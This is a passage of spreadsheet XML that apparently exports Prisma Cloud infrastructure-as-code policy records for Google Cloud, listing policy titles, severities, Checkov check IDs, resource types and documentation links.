google-cloudiot-device-registry,google-bigquery-data-transfer-config,google-compute-reservation,google-compute-router-bgp-peer,google-monitoring-uptime-check-config,google-compute-disk-resource-policy-attachment,google-bigquery-dataset-access,google-compute-target-http-proxy,google-vpc-access-connector,google-dataproc-job-iam,google-healthcare-hl7-v2-store-iam,google-dataproc-job,google-monitoring-metric-descriptor,google-compute-firewall,google-folder-iam-policy,google-compute-backend-bucket,google-logging-billing-account-sink,google-compute-network-endpoint-group,google-compute-forwarding-rule,google-cloud-asset-folder-feed,google-service-account-key,google-service-account-iam,google-iap-brand,google-storage-object-acl,google-bigquery-job,google-compute-ssl-certificate,google-resource-manager-lien,google-compute-global-address,google-binary-authorization-policy,google-logging-billing-account-bucket-config,google-active-directory-domain,google-dataproc-cluster-iam,google-compute-region-target-https-proxy,google-folder-iam-member,google-os-login-ssh-public-key,google-cloudfunctions-function,google-compute-health-check,google-container-analysis-occurrence,google-compute-instance-from-template,google-monitoring-notification-channel,google-sourcerepo-repository,google-compute-shared-vpc-service-project,google-iap-web-type-compute-iam,google-identity-platform-tenant-inbound-saml-config,google-cloud-run-domain-mapping,google-organization-iam-audit-config,google-project,google-healthcare-dicom-store-iam,google-dns-record-set,google-compute-instance-group-named-port,google-compute-instance-template,google-storage-bucket-object,google-project-organization-policy,google-compute-shared-vpc-host-project,google-compute-network-peering-routes-config,google-container-cluster,google-compute-vpn-gateway,google-compute-router,google-binary-authorization-attestor,google-logging-folder-bucket-config,google-compute-url-map,google-healthcare-dataset,google-data-catalog-tag-template,google-healthcare-dicom-store,google-redis-instance,google-cloud-asset-project-feed,google-organization-iam-custom-role,google-compute-region-health-check,google-bigquery-table,google-compute-target-tcp-proxy,google-iap-app-engine-service-iam,google-binary-authorization-attestor-iam,google-tpu-node,google-compute-http-health-check,google-storage-bucket-iam,google-sql-user,google-compute-subnetwork-iam,google-compute-resource-policy,google-compute-backend-bucket-signed-url-key,google-dataproc-autoscaling-policy,google-compute-region-instance-group-manager,google-pubsub-subscription-iam,google-compute-router-interface,google-endpoints-service-iam,google-logging-billing-account-exclusion,google-monitoring-group,google-project-iam-member,google-iap-web-type-app-engine-iam,google-app-engine-application-url-dispatch-rules,google-kms-key-ring-import-job,google-dns-policy,google-compute-region-backend-service,google-organization-iam-member,google-cloud-scheduler-job,google-secret-manager-secret-version,google-bigquery-dataset-iam,google-spanner-database,google-container-analysis-note,google-firestore-index,google-bigquery-dataset,google-storage-bucket-iam-member,google-dialogflow-agent,google-identity-platform-default-supported-idp-config,google-compute-project-metadata-item,google-compute-https-health-check,google-logging-organization-sink,google-storage-bucket-acl,google-cloud-run-service-iam,google-storage-bucket-iam-binding,google-compute-global-forwarding-rule,google-runtimeconfig-config-iam,google-storage-transfer-job,google-logging-project-sink,google-folder-organization-policy,google-project-iam-binding,google-app-engine-flexible-app-version,google-identity-platform-tenant-default-supported-idp-config,google-data-catalog-entry-group-iam,google-billing-account-iam-binding,google-storage-default-object-access-control,google-compute-network-peering,google-sql-source-representation-instance,google-access-context-manager-access-policy,google-storage-object-access-control,google-app-engine-standard-app-version,google-compute-image,google-cloud-tasks-queue</t>
        </is>
      </c>
      <c r="W980" t="inlineStr">
        <is>
          <t>Ensure that there are only GCP-managed service account keys for each service account</t>
        </is>
      </c>
      <c r="X980" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-that-there-are-only-gcp-managed-service-account-keys-for-each-service-account</t>
        </is>
      </c>
      <c r="Y980" t="inlineStr"/>
      <c r="Z980" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["google_healthcare_dataset_iam","google_identity_platform_tenant_oauth_idp_config","google_compute_node_template","google_iap_web_backend_service_iam","google_compute_snapshot","google_organization_iam_binding","google_access_context_manager_service_perimeter_resource","google_access_context_manager_access_level","google_deployment_manager_deployment","google_sourcerepo_repository_iam","google_compute_global_network_endpoint","google_kms_key_ring_iam","google_iap_tunnel_instance_iam","google_compute_region_disk_resource_policy_attachment","google_compute_region_url_map","google_monitoring_service","google_compute_disk","google_bigtable_app_profile","google_compute_network","google_identity_platform_tenant","google_dialogflow_intent","google_service_networking_connection","google_billing_account_iam_policy","google_folder","google_identity_platform_inbound_saml_config","google_compute_instance_iam","google_logging_organization_exclusion","google_cloud_asset_organization_feed","google_compute_security_policy","google_monitoring_dashboard","google_project_service","google_secret_manager_secret_iam","google_spanner_instance","google_monitoring_alert_policy","google_bigtable_gc_policy","google_network_management_connectivity_test_resource","google_compute_region_disk","google_healthcare_hl7_v2_store","google_storage_default_object_acl","google_secret_manager_secret","google_bigtable_instance_iam","google_folder_iam_audit_config","google_runtimeconfig_config","google_compute_backend_service","google_dataflow_job","google_compute_target_ssl_proxy","google_app_engine_application","google_sql_database","google_compute_target_pool","google_sql_ssl_cert","google_spanner_instance_iam","google_monitoring_slo","google_compute_attached_disk","google_compute_project_metadata","google_compute_target_https_proxy","google_iap_client","google_storage_bucket_access_control","google_healthcare_fhir_store_iam","google_compute_region_autoscaler","google_data_catalog_entry_group","google_composer_environment","google_billing_account_iam_member","google_compute_region_ssl_certificate","google_storage_hmac_key","google_iap_web_iam","google_app_engine_domain_mapping","google_storage_notification","google_logging_organization_bucket_config","google_organization_policy","google_datastore_index","google_logging_metric","google_sql_database_instance","google_organization_iam_policy","google_compute_instance_group","google_compute_instance_group_manager","google_data_catalog_tag","google_folder_iam_binding","google_pubsub_topic","google_logging_folder_sink","google_container_registry","google_compute_vpn_tunnel","google_scc_source","google_kms_secret_ciphertext","google_access_context_manager_service_perimeter","google_endpoints_service","google_dialogflow_entity_type","google_bigtable_instance","google_cloudfunctions_cloud_function_iam","google_cloudiot_device","google_compute_interconnect_attachment","google_compute_network_endpoint","google_spanner_database_iam","google_logging_folder_exclusion","google_app_engine_firewall_rule","google_storage_bucket","google_logging_project_bucket_config","google_compute_autoscaler","google_runtimeconfig_variable","google_app_engine_service_split_traffic","google_healthcare_fhir_store","google_iap_app_engine_version_iam","google_usage_export_bucket","google_bigtable_table","google_dataflow_flex_template_job","google_kms_key_ring","google_kms_crypto_key_iam","google_pubsub_topic_iam","google_kms_crypto_key","google_compute_ssl_policy","google_dataproc_cluster","google_compute_region_target_http_proxy","google_container_node_pool","google_compute_node_group","google_cloud_run_service","google_filestore_instance","google_compute_router_nat","google_service_account","google_compute_route","google_project_iam","google_logging_project_exclusion","google_compute_project_default_network_tier","google_compute_backend_service_signed_url_key","google_compute_subnetwork","google_cloudbuild_trigger","google_compute_address","google_pubsub_subscription","google_compute_global_network_endpoint_group","google_dns_managed_zone","google_project_iam_custom_role","google_compute_target_instance","google_data_catalog_entry","google_os_config_patch_deployment","google_identity_platform_oauth_idp_config","google_ml_engine_model","google_compute_instance","google_cloudiot_device_registry","google_bigquery_data_transfer_config","google_compute_reservation","google_compute_router_bgp_peer","google_monitoring_uptime_check_config","google_compute_disk_resource_policy_attachment","google_bigquery_dataset_access","google_compute_target_http_proxy","google_vpc_access_connector","google_dataproc_job_iam","google_healthcare_hl7_v2_store_iam","google_dataproc_job","google_monitoring_metric_descriptor","google_compute_firewall","google_folder_iam_policy","google_compute_backend_bucket","google_logging_billing_account_sink","google_compute_network_endpoint_group","google_compute_forwarding_rule","google_cloud_asset_folder_feed","google_service_account_key","google_service_account_iam","google_iap_brand","google_storage_object_acl","google_bigquery_job","google_compute_ssl_certificate","google_resource_manager_lien","google_compute_global_address","google_binary_authorization_policy","google_logging_billing_account_bucket_config","google_active_directory_domain","google_dataproc_cluster_iam","google_compute_region_target_https_proxy","google_folder_iam_member","google_os_login_ssh_public_key","google_cloudfunctions_function","google_compute_health_check","google_container_analysis_occurrence","google_compute_instance_from_template","google_monitoring_notification_channel","google_sourcerepo_repository","google_compute_shared_vpc_service_project","google_iap_web_type_compute_iam","google_identity_platform_tenant_inbound_saml_config","google_cloud_run_domain_mapping","google_organization_iam_audit_config","google_project","google_healthcare_dicom_store_iam","google_dns_record_set","google_compute_instance_group_named_port","google_compute_instance_template","google_storage_bucket_object","google_project_organization_policy","google_compute_shared_vpc_host_project","google_compute_network_peering_routes_config","google_container_cluster","google_compute_vpn_gateway","google_compute_router","google_binary_authorization_attestor","google_logging_folder_bucket_config","google_compute_url_map","google_healthcare_dataset","google_data_catalog_tag_template","google_healthcare_dicom_store","google_redis_instance","google_cloud_asset_project_feed","google_organization_iam_custom_role","google_compute_region_health_check","google_bigquery_table","google_compute_target_tcp_proxy","google_iap_app_engine_service_iam","google_binary_authorization_attestor_iam","google_tpu_node","google_compute_http_health_check","google_storage_bucket_iam","google_sql_user","google_compute_subnetwork_iam","google_compute_resource_policy","google_compute_backend_bucket_signed_url_key","google_dataproc_autoscaling_policy","google_compute_region_instance_group_manager","google_pubsub_subscription_iam","google_compute_router_interface","google_endpoints_service_iam","google_logging_billing_account_exclusion","google_monitoring_group","google_project_iam_member","google_iap_web_type_app_engine_iam","google_app_engine_application_url_dispatch_rules","google_kms_key_ring_import_job","google_dns_policy","google_compute_region_backend_service","google_organization_iam_member","google_cloud_scheduler_job","google_secret_manager_secret_version","google_bigquery_dataset_iam","google_spanner_database","google_container_analysis_note","google_firestore_index","google_bigquery_dataset","google_storage_bucket_iam_member","google_dialogflow_agent","google_identity_platform_default_supported_idp_config","google_compute_project_metadata_item","google_compute_https_health_check","google_logging_organization_sink","google_storage_bucket_acl","google_cloud_run_service_iam","google_storage_bucket_iam_binding","google_compute_global_forwarding_rule","google_runtimeconfig_config_iam","google_storage_transfer_job","google_logging_project_sink","google_folder_organization_policy","google_project_iam_binding","google_app_engine_flexible_app_version","google_identity_platform_tenant_default_supported_idp_config","google_data_catalog_entry_group_iam","google_billing_account_iam_binding","google_storage_default_object_access_control","google_compute_network_peering","google_sql_source_representation_instance","google_access_context_manager_access_policy","google_storage_object_access_control","google_app_engine_standard_app_version","google_compute_image","google_cloud_tasks_queue"]}</t>
        </is>
      </c>
      <c r="AA980" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB980" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC980" t="inlineStr">
        <is>
          <t>CKV2_GCP_3</t>
        </is>
      </c>
      <c r="AD980" t="b">
        <v>1</v>
      </c>
      <c r="AE980" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF980" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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0" t="inlineStr">
        <is>
          <t>e2becef9-8485-4a18-b9d5-803ed6bab232</t>
        </is>
      </c>
      <c r="AI980" t="inlineStr"/>
      <c r="AJ980" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK980" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="981">
      <c r="A981" t="inlineStr"/>
      <c r="B981" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C981" s="2" t="inlineStr"/>
      <c r="D981" t="inlineStr"/>
      <c r="E981" t="inlineStr"/>
      <c r="F981" t="inlineStr"/>
      <c r="G981" t="b">
        <v>1</v>
      </c>
      <c r="H9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1" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J981" t="inlineStr">
        <is>
          <t>IaC:General:google-kms</t>
        </is>
      </c>
      <c r="K981" t="inlineStr">
        <is>
          <t>GCP KMS keys are not protected from deletion</t>
        </is>
      </c>
      <c r="L981" t="inlineStr"/>
      <c r="M981" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N981" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O981" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P981" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q981" t="inlineStr"/>
      <c r="R981" t="inlineStr"/>
      <c r="S981" t="inlineStr"/>
      <c r="T981" t="b">
        <v>0</v>
      </c>
      <c r="U981" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V981" t="inlineStr">
        <is>
          <t>IaC:General:google-kms-crypto-key</t>
        </is>
      </c>
      <c r="W981" t="inlineStr">
        <is>
          <t>Ensure KMS keys are protected from deletion</t>
        </is>
      </c>
      <c r="X981" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-kms-keys-are-protected-from-deletion</t>
        </is>
      </c>
      <c r="Y981" t="inlineStr"/>
      <c r="Z981" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["google_kms_crypto_key"]}</t>
        </is>
      </c>
      <c r="AA981" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB981" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC981" t="inlineStr">
        <is>
          <t>CKV_GCP_82</t>
        </is>
      </c>
      <c r="AD981" t="b">
        <v>1</v>
      </c>
      <c r="AE981" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF981" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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1" t="inlineStr">
        <is>
          <t>db3149cb-de18-4818-b917-ead102d871b4</t>
        </is>
      </c>
      <c r="AI981" t="inlineStr"/>
      <c r="AJ981" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK981" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="982">
      <c r="A982" t="inlineStr">
        <is>
          <t>PCS SWAT Standards (SWATS) 1.0 - DO NOT TOUCH</t>
        </is>
      </c>
      <c r="B982" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C982" s="2" t="inlineStr"/>
      <c r="D982" t="inlineStr"/>
      <c r="E982" t="inlineStr"/>
      <c r="F982" t="inlineStr"/>
      <c r="G982" t="b">
        <v>1</v>
      </c>
      <c r="H9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2" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J982" t="inlineStr">
        <is>
          <t>IaC:General:google-kms</t>
        </is>
      </c>
      <c r="K982" t="inlineStr">
        <is>
          <t>GCP Cloud KMS Key Rings are anonymously or publicly accessible</t>
        </is>
      </c>
      <c r="L982" t="inlineStr"/>
      <c r="M982" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N982" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O982" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P982" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q982" t="inlineStr">
        <is>
          <t>5.1 Config</t>
        </is>
      </c>
      <c r="R982" t="inlineStr">
        <is>
          <t>5.1.1 Config - Other</t>
        </is>
      </c>
      <c r="S982" t="inlineStr"/>
      <c r="T982" t="b">
        <v>0</v>
      </c>
      <c r="U982" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V982" t="inlineStr">
        <is>
          <t>IaC:General:google-kms-key-ring,google-kms-key-ring-iam-member,google-kms-key-ring-iam-binding</t>
        </is>
      </c>
      <c r="W982" t="inlineStr">
        <is>
          <t>Ensure that Cloud KMS Key Rings are not anonymously or publicly accessible</t>
        </is>
      </c>
      <c r="X982" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-iam-policies/ensure-gcp-cloud-kms-key-rings-is-not-publicly-accessible-1</t>
        </is>
      </c>
      <c r="Y982" t="inlineStr"/>
      <c r="Z982" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["google_kms_key_ring", "google_kms_key_ring_iam_member", "google_kms_key_ring_iam_binding"]}</t>
        </is>
      </c>
      <c r="AA982" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB982" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC982" t="inlineStr">
        <is>
          <t>CKV2_GCP_8</t>
        </is>
      </c>
      <c r="AD982" t="b">
        <v>1</v>
      </c>
      <c r="AE982" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF982" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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2" t="inlineStr">
        <is>
          <t>d3c19de3-1388-4d33-972e-a0b1d6a19d02</t>
        </is>
      </c>
      <c r="AI982" t="inlineStr"/>
      <c r="AJ982" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK982" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="983">
      <c r="A983" t="inlineStr"/>
      <c r="B983" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C983" s="2" t="inlineStr"/>
      <c r="D983" t="inlineStr"/>
      <c r="E983" t="inlineStr"/>
      <c r="F983" t="inlineStr"/>
      <c r="G983" t="b">
        <v>1</v>
      </c>
      <c r="H9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3" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J983" t="inlineStr">
        <is>
          <t>IaC:General:google-notebooks</t>
        </is>
      </c>
      <c r="K983" t="inlineStr">
        <is>
          <t>Vertex AI instance disks not encrypted with a Customer Managed Key (CMK)</t>
        </is>
      </c>
      <c r="L983" t="inlineStr"/>
      <c r="M983" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N983" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O983" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P983" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q983" t="inlineStr"/>
      <c r="R983" t="inlineStr"/>
      <c r="S983" t="inlineStr"/>
      <c r="T983" t="b">
        <v>0</v>
      </c>
      <c r="U983" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V983" t="inlineStr">
        <is>
          <t>IaC:General:google-notebooks-instance</t>
        </is>
      </c>
      <c r="W983" t="inlineStr">
        <is>
          <t>Ensure Vertex AI instance disks are encrypted with a Customer Managed Key (CMK)</t>
        </is>
      </c>
      <c r="X983" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-general-policies/bc-google-cloud-2-21</t>
        </is>
      </c>
      <c r="Y983" t="inlineStr"/>
      <c r="Z983" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["google_notebooks_instance"]}</t>
        </is>
      </c>
      <c r="AA983" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB983" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC983" t="inlineStr">
        <is>
          <t>CKV2_GCP_21</t>
        </is>
      </c>
      <c r="AD983" t="b">
        <v>1</v>
      </c>
      <c r="AE983" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF983" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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3" t="inlineStr">
        <is>
          <t>f77cb04b-0035-46f1-a872-19dd39807ec6</t>
        </is>
      </c>
      <c r="AI983" t="inlineStr"/>
      <c r="AJ983" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK983" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="984">
      <c r="A984" t="inlineStr"/>
      <c r="B984" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C984" s="2" t="inlineStr"/>
      <c r="D984" t="inlineStr"/>
      <c r="E984" t="inlineStr"/>
      <c r="F984" t="inlineStr"/>
      <c r="G984" t="b">
        <v>1</v>
      </c>
      <c r="H9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4" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J984" t="inlineStr">
        <is>
          <t>IaC:General:google-notebooks</t>
        </is>
      </c>
      <c r="K984" t="inlineStr">
        <is>
          <t>GCP Vertex AI instances are not private</t>
        </is>
      </c>
      <c r="L984" t="inlineStr"/>
      <c r="M984" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N984" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O984" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P984" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q984" t="inlineStr"/>
      <c r="R984" t="inlineStr"/>
      <c r="S984" t="inlineStr"/>
      <c r="T984" t="b">
        <v>0</v>
      </c>
      <c r="U984" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V984" t="inlineStr">
        <is>
          <t>IaC:General:google-notebooks-instance</t>
        </is>
      </c>
      <c r="W984" t="inlineStr">
        <is>
          <t>Ensure Vertex AI instances are private</t>
        </is>
      </c>
      <c r="X984" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-public-policies/ensure-gcp-vertex-ai-workbench-does-not-have-public-ips</t>
        </is>
      </c>
      <c r="Y984" t="inlineStr"/>
      <c r="Z984" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["google_notebooks_instance"]}</t>
        </is>
      </c>
      <c r="AA984" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB984" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC984" t="inlineStr">
        <is>
          <t>CKV_GCP_89</t>
        </is>
      </c>
      <c r="AD984" t="b">
        <v>1</v>
      </c>
      <c r="AE984" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF984" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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4" t="inlineStr">
        <is>
          <t>60313d7a-ff41-40ed-8bf0-74087cc0be9e</t>
        </is>
      </c>
      <c r="AI984" t="inlineStr"/>
      <c r="AJ984" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK984" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="985">
      <c r="A985" t="inlineStr"/>
      <c r="B985" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C985" s="2" t="inlineStr"/>
      <c r="D985" t="inlineStr"/>
      <c r="E985" t="inlineStr"/>
      <c r="F985" t="inlineStr"/>
      <c r="G985" t="b">
        <v>1</v>
      </c>
      <c r="H9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5" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J985" t="inlineStr">
        <is>
          <t>IaC:General:google-notebooks</t>
        </is>
      </c>
      <c r="K985" t="inlineStr">
        <is>
          <t>Vertex AI runtime is not encrypted with a Customer Managed Key (CMK)</t>
        </is>
      </c>
      <c r="L985" t="inlineStr"/>
      <c r="M985" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N985" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O985" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P985" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q985" t="inlineStr"/>
      <c r="R985" t="inlineStr"/>
      <c r="S985" t="inlineStr"/>
      <c r="T985" t="b">
        <v>0</v>
      </c>
      <c r="U985" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V985" t="inlineStr">
        <is>
          <t>IaC:General:google-notebooks-runtime</t>
        </is>
      </c>
      <c r="W985" t="inlineStr">
        <is>
          <t>Ensure Vertex AI runtime is encrypted with a Customer Managed Key (CMK)</t>
        </is>
      </c>
      <c r="X985" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-general-policies/bc-google-cloud-2-35</t>
        </is>
      </c>
      <c r="Y985" t="inlineStr"/>
      <c r="Z985" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["google_notebooks_runtime"]}</t>
        </is>
      </c>
      <c r="AA985" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB985" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC985" t="inlineStr">
        <is>
          <t>CKV2_GCP_35</t>
        </is>
      </c>
      <c r="AD985" t="b">
        <v>1</v>
      </c>
      <c r="AE985" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF985" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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5" t="inlineStr">
        <is>
          <t>93ab2b32-5f28-4831-b29d-dd236742f377</t>
        </is>
      </c>
      <c r="AI985" t="inlineStr"/>
      <c r="AJ985" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK985" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="986">
      <c r="A986" t="inlineStr"/>
      <c r="B986" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C986" s="2" t="inlineStr"/>
      <c r="D986" t="inlineStr"/>
      <c r="E986" t="inlineStr"/>
      <c r="F986" t="inlineStr"/>
      <c r="G986" t="b">
        <v>1</v>
      </c>
      <c r="H9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6" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J986" t="inlineStr">
        <is>
          <t>IaC:General:google-pubsub</t>
        </is>
      </c>
      <c r="K986" t="inlineStr">
        <is>
          <t>GCP Pub/Sub Topics are not encrypted with Customer Supplied Encryption Keys (CSEK)</t>
        </is>
      </c>
      <c r="L986" t="inlineStr"/>
      <c r="M986" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N986" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O986" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P986" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q986" t="inlineStr"/>
      <c r="R986" t="inlineStr"/>
      <c r="S986" t="inlineStr"/>
      <c r="T986" t="b">
        <v>0</v>
      </c>
      <c r="U986" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V986" t="inlineStr">
        <is>
          <t>IaC:General:google-pubsub-topic</t>
        </is>
      </c>
      <c r="W986" t="inlineStr">
        <is>
          <t>Ensure PubSub Topics are encrypted with Customer Supplied Encryption Keys (CSEK)</t>
        </is>
      </c>
      <c r="X986" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-pubsub-topics-are-encrypted-with-customer-supplied-encryption-keys-csek</t>
        </is>
      </c>
      <c r="Y986" t="inlineStr"/>
      <c r="Z986" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["google_pubsub_topic"]}</t>
        </is>
      </c>
      <c r="AA986" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB986" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC986" t="inlineStr">
        <is>
          <t>CKV_GCP_83</t>
        </is>
      </c>
      <c r="AD986" t="b">
        <v>1</v>
      </c>
      <c r="AE986" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF986" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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6" t="inlineStr">
        <is>
          <t>d14ed174-3ef7-4b69-b88e-545316a0c16e</t>
        </is>
      </c>
      <c r="AI986" t="inlineStr"/>
      <c r="AJ986" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK986" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="987">
      <c r="A987" t="inlineStr"/>
      <c r="B987" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C987" s="2" t="inlineStr"/>
      <c r="D987" t="inlineStr"/>
      <c r="E987" t="inlineStr"/>
      <c r="F987" t="inlineStr"/>
      <c r="G987" t="b">
        <v>1</v>
      </c>
      <c r="H9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7" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J987" t="inlineStr">
        <is>
          <t>IaC:General:google-pubsub</t>
        </is>
      </c>
      <c r="K987" t="inlineStr">
        <is>
          <t>GCP Pub/Sub Topics are anonymously or publicly accessible</t>
        </is>
      </c>
      <c r="L987" t="inlineStr"/>
      <c r="M987" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N987" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O987" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P987" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
